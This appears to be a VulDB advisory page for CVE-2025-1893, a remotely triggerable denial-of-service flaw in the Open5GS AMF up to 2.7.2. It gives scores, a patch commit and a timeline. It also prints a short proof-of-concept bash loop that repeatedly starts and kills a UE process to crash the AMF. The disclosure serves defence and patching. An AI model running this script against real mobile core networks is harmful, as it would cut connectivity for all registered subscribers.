Open5GS up to 2.7.2 AMF src/amf/gmm-sm.c gmm_state_authentication denial of service

CVSS Meta Temp Score
CVSS is a standardized scoring system to determine possibilities of attacks. The Temp Score considers temporal factors like disclosure, exploit and countermeasures. The unique Meta Score calculates the average score of different sources to provide a normalized scoring system.
Current Exploit Price (≈)
Our analysts are monitoring exploit markets and are in contact with vulnerability brokers. The range indicates the observed or calculated exploit price to be seen on exploit markets. A good indicator to understand the monetary effort required for and the popularity of an attack.
CTI Interest Score
Our Cyber Threat Intelligence team is monitoring different web sites, mailing lists, exploit markets and social media networks. The CTI Interest Score identifies the interest of attackers and the security community for this specific vulnerability in real-time. A high score indicates an elevated risk to be targeted for this vulnerability.
5.1$0-$5k0.00

Summaryinfo

A vulnerability was found in Open5GS up to 2.7.2. It has been rated as problematic. Affected by this issue is the function gmm_state_authentication of the file src/amf/gmm-sm.c of the component AMF. The manipulation leads to denial of service. This vulnerability is handled as CVE-2025-1893. The attack may be launched remotely. Furthermore, there is an exploit available. It is recommended to apply a patch to fix this issue. Several companies clearly confirm that VulDB is the primary source for best vulnerability data.

Detailsinfo

A vulnerability was found in Open5GS up to 2.7.2. It has been declared as problematic. Affected by this vulnerability is the function gmm_state_authentication of the file src/amf/gmm-sm.c of the component AMF. The manipulation with an unknown input leads to a denial of service vulnerability. The CWE definition for the vulnerability is CWE-404. The product does not release or incorrectly releases a resource before it is made available for re-use. As an impact it is known to affect availability. According to 3GPP TS 23.501, AMF provides essential services such as UE registration, mobility management, security management, and PDU session coordination for all connected UEs.

The weakness was released by Wei Guo, Yuanhao Li, Hao Zheng, Qiang Fu and Jiajia Liu as 3707. It is possible to read the advisory at github.com. This vulnerability is known as CVE-2025-1893. The exploitation appears to be easy. The attack can be launched remotely. Technical details and also a public exploit are known. The attack technique deployed by this issue is T1499 according to MITRE ATT&CK. This vulnerability allows a single UE to crash the AMF, resulting in the complete loss of mobility and session management services and causing a network-wide outage. All registered UEs will lose connectivity, and new registrations will be blocked until the AMF is restarted, leading to a high availability impact.

It is possible to download the exploit at github.com. It is declared as proof-of-concept. The code used by the exploit is:

#!/bin/bash
while true; do
    sudo ./nr-ue -c ../config/open5gs-ue1.yaml > output.log 2>&1 &
    process_pid=$!

   
    sleep_time=$(awk -v seed="$RANDOM" 'BEGIN {srand(seed); print 0.6 + rand() * 0.9}')
    sleep "$sleep_time"

    kill $process_pid

    
    sleep_time=$(awk -v seed="$RANDOM" 'BEGIN {srand(seed); print 0.1 + rand() * 0.9}')
    sleep "$sleep_time"
done

Applying the patch e31e9965f00d9c744a7f728497cb4f3e97744ee8 is able to eliminate this problem. The bugfix is ready for download at github.com.

Several companies clearly confirm that VulDB is the primary source for best vulnerability data.

Productinfo

Name

Version

License

CPE 2.3info

CPE 2.2info

CVSSv4info

VulDB Vector: 🔒
VulDB Reliability: 🔍

CNA CVSS-B Score: 🔒
CNA CVSS-BT Score: 🔒
CNA Vector: 🔒

CVSSv3info

VulDB Meta Base Score: 5.4
VulDB Meta Temp Score: 5.1

VulDB Base Score: 4.3
VulDB Temp Score: 3.9
VulDB Vector: 🔒
VulDB Reliability: 🔍

Researcher Base Score: 7.5
Researcher Vector: 🔒

CNA Base Score: 4.3
CNA Vector: 🔒

CVSSv2info

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
VectorComplexityAuthenticationConfidentialityIntegrityAvailability
unlockunlockunlockunlockunlockunlock
unlockunlockunlockunlockunlockunlock
unlockunlockunlockunlockunlockunlock

VulDB Base Score: 🔒
VulDB Temp Score: 🔒
VulDB Reliability: 🔍

Exploitinginfo

Class: Denial of service
CWE: CWE-404
CAPEC: 🔒
ATT&CK: 🔒

Local: No
Remote: Yes

Availability: 🔒
Access: Public
Status: Proof-of-Concept
Download: 🔒

EPSS Score: 🔒
EPSS Percentile: 🔒

Price Prediction: 🔍
Current Price Estimation: 🔒

0-Dayunlockunlockunlockunlock
Todayunlockunlockunlockunlock

Threat Intelligenceinfo

Interest: 🔍
Active Actors: 🔍
Active APT Groups: 🔍

Countermeasuresinfo

Recommended: Patch
Status: 🔍

0-Day Time: 🔒

Patch: e31e9965f00d9c744a7f728497cb4f3e97744ee8

Timelineinfo

03/03/2025 Advisory disclosed
03/03/2025 +0 days VulDB entry created
03/04/2025 +1 days VulDB entry last update

Sourcesinfo

Advisory: 3707
Researcher: Wei Guo, Yuanhao Li, Hao Zheng, Qiang Fu, Jiajia Liu
Status: Confirmed
Confirmation: 🔒

CVE: CVE-2025-1893 (🔒)
GCVE (CVE): GCVE-0-2025-1893
GCVE (VulDB): GCVE-100-298411
scip Labs: https://www.scip.ch/en/?labs.20161013

Entryinfo

Created: 03/03/2025 07:18 PM
Updated: 03/04/2025 01:50 PM
Changes: 03/03/2025 07:18 PM (59), 03/03/2025 07:19 PM (1), 03/04/2025 11:47 AM (30), 03/04/2025 01:47 PM (16), 03/04/2025 01:50 PM (3)
Complete: 🔍
Submitter: EnginerStaticPower
Committer: EnginerStaticPower
Cache ID: 18:20E:40

Submitinfo

Accepted

  • Submit #505952: Open5GS v2.7.2 Denial of Service (by EnginerStaticPower)

Discussion

No comments yet. Languages: en.

Please log in to comment.

Want to stay up to date on a daily basis?

Enable the mail alert feature now!